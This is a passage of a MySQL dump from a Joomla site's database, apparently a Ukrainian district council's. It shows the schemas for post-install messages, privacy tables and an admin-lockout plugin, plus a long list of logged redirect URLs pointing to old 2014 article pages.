/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_plg_system_adminexile` (
  `ip` varchar(45) NOT NULL,
  `firstattempt` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `lastattempt` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `attempts` int(11) NOT NULL,
  `penalty` int(11) NOT NULL,
  PRIMARY KEY (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_plg_system_adminexile`
--

LOCK TABLES `fw3gt_plg_system_adminexile` WRITE;
/*!40000 ALTER TABLE `fw3gt_plg_system_adminexile` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_plg_system_adminexile` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_postinstall_messages`
--

DROP TABLE IF EXISTS `fw3gt_postinstall_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_postinstall_messages` (
  `postinstall_message_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `extension_id` bigint(20) NOT NULL DEFAULT '700' COMMENT 'FK to #__extensions',
  `title_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Lang key for the title',
  `description_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Lang key for description',
  `action_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language_extension` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys',
  `language_client_id` tinyint(3) NOT NULL DEFAULT '1',
  `type` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action',
  `action_file` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method',
  `action` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT '' COMMENT 'Action method name or URL',
  `condition_file` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 'RAD URI to file holding display condition method',
  `condition_method` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 'Display condition method, must return boolean',
  `version_introduced` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced',
  `enabled` tinyint(3) NOT NULL DEFAULT '1',
  PRIMARY KEY (`postinstall_message_id`)
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_postinstall_messages`
--

LOCK TABLES `fw3gt_postinstall_messages` WRITE;
/*!40000 ALTER TABLE `fw3gt_postinstall_messages` DISABLE KEYS */;
INSERT INTO `fw3gt_postinstall_messages` VALUES (1,700,'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION','plg_twofactorauth_totp',1,'action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_condition','3.2.0',1),(2,700,'COM_CPANEL_MSG_EACCELERATOR_TITLE','COM_CPANEL_MSG_EACCELERATOR_BODY','COM_CPANEL_MSG_EACCELERATOR_BUTTON','com_cpanel',1,'action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_condition','3.2.0',1),(4,700,'COM_CPANEL_MSG_HTACCESS_TITLE','COM_CPANEL_MSG_HTACCESS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/htaccess.php','admin_postinstall_htaccess_condition','3.4.0',1),(5,700,'COM_CPANEL_MSG_ROBOTS_TITLE','COM_CPANEL_MSG_ROBOTS_BODY','','com_cpanel',1,'message','','','','','3.3.0',1),(6,700,'COM_CPANEL_MSG_LANGUAGEACCESS340_TITLE','COM_CPANEL_MSG_LANGUAGEACCESS340_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/languageaccess340.php','admin_postinstall_languageaccess340_condition','3.4.1',1),(7,700,'COM_CPANEL_MSG_STATS_COLLECTION_TITLE','COM_CPANEL_MSG_STATS_COLLECTION_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/statscollection.php','admin_postinstall_statscollection_condition','3.5.0',1),(8,700,'PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME','PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME_BODY','PLG_SYSTEM_UPDATENOTIFICATION_POSTINSTALL_UPDATECACHETIME_ACTION','plg_system_updatenotification',1,'action','site://plugins/system/updatenotification/postinstall/updatecachetime.php','updatecachetime_postinstall_action','site://plugins/system/updatenotification/postinstall/updatecachetime.php','updatecachetime_postinstall_condition','3.6.3',1),(9,700,'COM_CPANEL_MSG_JOOMLA40_PRE_CHECKS_TITLE','COM_CPANEL_MSG_JOOMLA40_PRE_CHECKS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/joomla40checks.php','admin_postinstall_joomla40checks_condition','3.7.0',1),(10,700,'TPL_HATHOR_MESSAGE_POSTINSTALL_TITLE','TPL_HATHOR_MESSAGE_POSTINSTALL_BODY','TPL_HATHOR_MESSAGE_POSTINSTALL_ACTION','tpl_hathor',1,'action','admin://templates/hathor/postinstall/hathormessage.php','hathormessage_postinstall_action','admin://templates/hathor/postinstall/hathormessage.php','hathormessage_postinstall_condition','3.7.0',1),(11,700,'PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_TITLE','PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_BODY','PLG_PLG_RECAPTCHA_VERSION_1_POSTINSTALL_ACTION','plg_captcha_recaptcha',1,'action','site://plugins/captcha/recaptcha/postinstall/actions.php','recaptcha_postinstall_action','site://plugins/captcha/recaptcha/postinstall/actions.php','recaptcha_postinstall_condition','3.8.6',1),(12,700,'COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_TITLE','COM_CPANEL_MSG_UPDATEDEFAULTSETTINGS_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/updatedefaultsettings.php','admin_postinstall_updatedefaultsettings_condition','3.8.8',1),(13,700,'COM_ACTIONLOGS_POSTINSTALL_TITLE','COM_ACTIONLOGS_POSTINSTALL_BODY','','com_actionlogs',1,'message','','','','','3.9.0',0),(14,700,'COM_PRIVACY_POSTINSTALL_TITLE','COM_PRIVACY_POSTINSTALL_BODY','','com_privacy',1,'message','','','','','3.9.0',0),(15,700,'COM_CPANEL_MSG_ADDNOSNIFF_TITLE','COM_CPANEL_MSG_ADDNOSNIFF_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/addnosniff.php','admin_postinstall_addnosniff_condition','3.9.3',0);
/*!40000 ALTER TABLE `fw3gt_postinstall_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_privacy_consents`
--

DROP TABLE IF EXISTS `fw3gt_privacy_consents`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_privacy_consents` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `state` int(10) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `subject` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `body` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `remind` tinyint(4) NOT NULL DEFAULT '0',
  `token` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_privacy_consents`
--

LOCK TABLES `fw3gt_privacy_consents` WRITE;
/*!40000 ALTER TABLE `fw3gt_privacy_consents` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_privacy_consents` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_privacy_requests`
--

DROP TABLE IF EXISTS `fw3gt_privacy_requests`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_privacy_requests` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `requested_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `status` tinyint(4) NOT NULL DEFAULT '0',
  `request_type` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `confirm_token` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `confirm_token_created_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_privacy_requests`
--

LOCK TABLES `fw3gt_privacy_requests` WRITE;
/*!40000 ALTER TABLE `fw3gt_privacy_requests` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_privacy_requests` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_redirect_links`
--

DROP TABLE IF EXISTS `fw3gt_redirect_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_redirect_links` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `old_url` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `new_url` varchar(2048) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `referer` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(4) NOT NULL,
  `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `header` smallint(3) NOT NULL DEFAULT '301',
  PRIMARY KEY (`id`),
  KEY `idx_link_modifed` (`modified_date`),
  KEY `idx_old_url` (`old_url`(100))
) ENGINE=InnoDB AUTO_INCREMENT=38695 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_redirect_links`
--

LOCK TABLES `fw3gt_redirect_links` WRITE;
/*!40000 ALTER TABLE `fw3gt_redirect_links` DISABLE KEYS */;
INSERT INTO `fw3gt_redirect_links` VALUES (1,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:--------2013-&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-16 08:48:22','0000-00-00 00:00:00',301),(2,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=57&Itemid=98&lang=en','','','',35,0,'2014-09-16 08:48:22','0000-00-00 00:00:00',301),(3,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45&Itemid=84&lang=uk','','','',5,0,'2014-09-16 08:48:51','0000-00-00 00:00:00',301),(4,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=36&Itemid=70&lang=en','','','',9,0,'2014-09-16 08:49:19','0000-00-00 00:00:00',301),(5,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53&Itemid=94&lang=ru','','','',10,0,'2014-09-16 09:16:23','0000-00-00 00:00:00',301),(6,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=597:-l-r-2011-&catid=40&Itemid=77&lang=ru','','','',5,0,'2014-09-16 09:16:46','0000-00-00 00:00:00',301),(7,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33&Itemid=66&lang=uk','','','',3,0,'2014-09-16 09:19:34','0000-00-00 00:00:00',301),(8,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=13&Itemid=33&lang=ru','','','',12,0,'2014-09-16 09:19:38','0000-00-00 00:00:00',301),(9,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',15,0,'2014-09-16 09:21:27','0000-00-00 00:00:00',301),(10,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&Itemid=14&lang=uk','','','',22,0,'2014-09-16 09:21:59','0000-00-00 00:00:00',301),(11,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',17,0,'2014-09-16 09:23:29','0000-00-00 00:00:00',301),(12,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',8,0,'2014-09-16 09:25:11','0000-00-00 00:00:00',301),(13,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20:2010-06-07-09-15-05&Itemid=42&lang=en','','','',5,0,'2014-09-16 09:25:25','0000-00-00 00:00:00',301),(14,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=ru','','','',47,0,'2014-09-16 09:26:01','0000-00-00 00:00:00',301),(15,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-16 09:26:04','0000-00-00 00:00:00',301),(16,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&catid=46:--21122012&Itemid=85&lang=en','','','',12,0,'2014-09-16 09:27:21','0000-00-00 00:00:00',301),(17,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:-2012-2015-&catid=38&Itemid=73&lang=ru','','','',8,0,'2014-09-16 09:27:44','0000-00-00 00:00:00',301),(18,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&Itemid=14&lang=uk','','','',23,0,'2014-09-16 09:28:24','0000-00-00 00:00:00',301),(19,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=uk','','','',12,0,'2014-09-16 09:31:54','0000-00-00 00:00:00',301),(20,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=318:------------2007-2011&catid=33:-20052011&Itemid=66&lang=uk','','','',1,0,'2014-09-16 09:33:19','0000-00-00 00:00:00',301),(21,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-16 09:34:13','0000-00-00 00:00:00',301),(22,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1:2010-06-05-13-18-17&catid=9:2010-06-05-12-55-45&Itemid=11&lang=en','','','',8,0,'2014-09-16 09:34:38','0000-00-00 00:00:00',301),(23,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-16 09:38:55','0000-00-00 00:00:00',301),(24,'http://malyn-rayrada.org.ua/index.php/home','','','',1,0,'2014-09-16 09:40:03','0000-00-00 00:00:00',301),(25,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:------15112013&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',1,0,'2014-09-16 09:40:23','0000-00-00 00:00:00',301),(26,'http://www.malyn-rayrada.org.ua/index.php?option=com_rd_sitemap&view=sitemap&id=1&Itemid=31&lang=uk','','','',33,0,'2014-09-16 09:40:30','0000-00-00 00:00:00',301),(27,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56&Itemid=97&lang=ru','','','',9,0,'2014-09-16 09:40:37','0000-00-00 00:00:00',301),(28,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&Itemid=14&lang=ru','','','',15,0,'2014-09-16 09:40:45','0000-00-00 00:00:00',301),(29,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57:--15042014-&Itemid=98&lang=en','','','',20,0,'2014-09-16 09:40:48','0000-00-00 00:00:00',301),(30,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',18,0,'2014-09-16 09:41:24','0000-00-00 00:00:00',301),(31,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51&Itemid=92&lang=en','','','',14,0,'2014-09-16 09:41:32','0000-00-00 00:00:00',301),(32,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',19,0,'2014-09-16 09:41:39','0000-00-00 00:00:00',301),(33,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',18,0,'2014-09-16 09:41:58','0000-00-00 00:00:00',301),(34,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54:--29112013-&Itemid=95&lang=uk','','','',23,0,'2014-09-16 09:42:08','0000-00-00 00:00:00',301),(35,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51&Itemid=92&lang=uk','','','',12,0,'2014-09-16 09:42:12','0000-00-00 00:00:00',301),(36,'http://www.malyn-rayrada.org.ua/index.php/novini_2','','http://www.malyn-rayrada.org.ua/','',1,0,'2014-09-16 09:42:33','0000-00-00 00:00:00',301),(37,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:--------25--2013--464-l-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',17,0,'2014-09-16 09:42:49','0000-00-00 00:00:00',301),(38,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-16 09:42:55','0000-00-00 00:00:00',301),(39,'http://malyn-rayrada.org.ua/index.php/novini_2?start=5','','','',1,0,'2014-09-16 09:43:05','0000-00-00 00:00:00',301),(40,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51:--19072013-&Itemid=92&lang=uk','','','',7,0,'2014-09-16 09:43:15','0000-00-00 00:00:00',301),(41,'http://malyn-rayrada.org.ua/index.php/novini_2?start=30','','','',1,0,'2014-09-16 09:43:44','0000-00-00 00:00:00',301),(42,'http://malyn-rayrada.org.ua/index.php/novini_2?start=15','','','',1,0,'2014-09-16 09:43:45','0000-00-00 00:00:00',301),(43,'http://malyn-rayrada.org.ua/index.php/novini_2?start=20','','','',1,0,'2014-09-16 09:43:52','0000-00-00 00:00:00',301),(44,'http://malyn-rayrada.org.ua/index.php/novini_2?start=25','','','',1,0,'2014-09-16 09:43:54','0000-00-00 00:00:00',301),(45,'http://malyn-rayrada.org.ua/index.php/novini_2?start=10','','','',1,0,'2014-09-16 09:43:54','0000-00-00 00:00:00',301),(46,'http://malyn-rayrada.org.ua/index.php?option=com_rd_sitemap&view=sitemap&id=1&Itemid=31&lang=uk','','','',7,0,'2014-09-16 09:44:47','0000-00-00 00:00:00',301),(47,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54&Itemid=95&lang=uk','','','',1,0,'2014-09-16 09:45:17','0000-00-00 00:00:00',301),(48,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10&Itemid=17&lang=uk','','','',8,0,'2014-09-16 09:45:53','0000-00-00 00:00:00',301),(49,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51&Itemid=92&lang=uk','','','',4,0,'2014-09-16 09:46:00','0000-00-00 00:00:00',301),(50,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=36&Itemid=70&lang=ru','','','',10,0,'2014-09-16 09:46:04','0000-00-00 00:00:00',301),(51,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53:--25102013-&Itemid=94&lang=uk','','','',6,0,'2014-09-16 09:46:49','0000-00-00 00:00:00',301),(52,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-09-16 09:47:11','0000-00-00 00:00:00',301),(53,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',16,0,'2014-09-16 09:47:37','0000-00-00 00:00:00',301),(54,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:--------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-16 09:47:46','0000-00-00 00:00:00',301),(55,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-16 09:48:05','0000-00-00 00:00:00',301),(56,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58&Itemid=105&lang=en','','','',3,0,'2014-09-16 09:48:18','0000-00-00 00:00:00',301),(57,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-16 09:48:21','0000-00-00 00:00:00',301),(58,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',30,0,'2014-09-16 09:48:34','0000-00-00 00:00:00',301),(59,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-16 09:49:06','0000-00-00 00:00:00',301),(60,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10&Itemid=17&lang=ru','','','',6,0,'2014-09-16 09:50:30','0000-00-00 00:00:00',301),(61,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=uk','','','',11,0,'2014-09-16 09:51:26','0000-00-00 00:00:00',301),(62,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-16 09:52:01','0000-00-00 00:00:00',301),(63,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-09-16 09:52:04','0000-00-00 00:00:00',301),(64,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58&Itemid=105&lang=en','','','',6,0,'2014-09-16 09:52:13','0000-00-00 00:00:00',301),(65,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=en&Itemid=0','','','',6,0,'2014-09-16 09:52:31','0000-00-00 00:00:00',301),(66,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=uk','','','',8,0,'2014-09-16 09:52:36','0000-00-00 00:00:00',301),(67,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54:--29112013-&Itemid=95&lang=ru','','','',18,0,'2014-09-16 09:52:53','0000-00-00 00:00:00',301),(68,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=59:--20062014-&Itemid=107&lang=en','','','',6,0,'2014-09-16 09:52:55','0000-00-00 00:00:00',301),(69,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54&Itemid=95&lang=ru','','','',8,0,'2014-09-16 09:53:01','0000-00-00 00:00:00',301),(70,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-16 09:55:02','0000-00-00 00:00:00',301),(71,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-16 09:55:09','0000-00-00 00:00:00',301),(72,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36&Itemid=70&lang=ru','','','',14,0,'2014-09-16 09:57:06','0000-00-00 00:00:00',301),(73,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49:--12042013-&Itemid=88&lang=uk','','','',4,0,'2014-09-16 09:58:49','0000-00-00 00:00:00',301),(74,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49:--12042013-&Itemid=88&lang=uk','','','',4,0,'2014-09-16 09:58:53','0000-00-00 00:00:00',301),(75,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49:--12042013-&Itemid=88&lang=uk','','','',2,0,'2014-09-16 09:58:57','0000-00-00 00:00:00',301),(76,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49:--12042013-&Itemid=88&lang=uk','','','',4,0,'2014-09-16 09:59:01','0000-00-00 00:00:00',301),(77,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49:--12042013-&Itemid=88&lang=uk','','','',4,0,'2014-09-16 09:59:04','0000-00-00 00:00:00',301),(78,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49:--12042013-&Itemid=88&lang=uk','','','',3,0,'2014-09-16 09:59:08','0000-00-00 00:00:00',301),(79,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49:--12042013-&Itemid=88&lang=uk','','','',5,0,'2014-09-16 09:59:11','0000-00-00 00:00:00',301),(80,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49:--12042013-&Itemid=88&lang=uk','','','',2,0,'2014-09-16 09:59:14','0000-00-00 00:00:00',301),(81,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59&Itemid=107&lang=en','','','',1,0,'2014-09-16 10:00:43','0000-00-00 00:00:00',301),(82,'http://www.malyn-rayrada.org.ua/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',26,0,'2014-09-16 10:01:13','0000-00-00 00:00:00',301),(83,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-09-16 10:01:29','0000-00-00 00:00:00',301),(84,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',19,0,'2014-09-16 10:05:40','0000-00-00 00:00:00',301),(85,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51&Itemid=92&lang=en','','','',13,0,'2014-09-16 10:09:35','0000-00-00 00:00:00',301),(86,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-16 10:09:43','0000-00-00 00:00:00',301),(87,'http://www.malyn-rayrada.org.ua/index.php?option=com_rd_sitemap&view=sitemap&id=1&Itemid=31&lang=ru','','','',27,0,'2014-09-16 10:13:13','0000-00-00 00:00:00',301),(88,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',12,0,'2014-09-16 10:14:27','0000-00-00 00:00:00',301),(89,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51:--19072013-&Itemid=92&lang=uk','','','',24,0,'2014-09-16 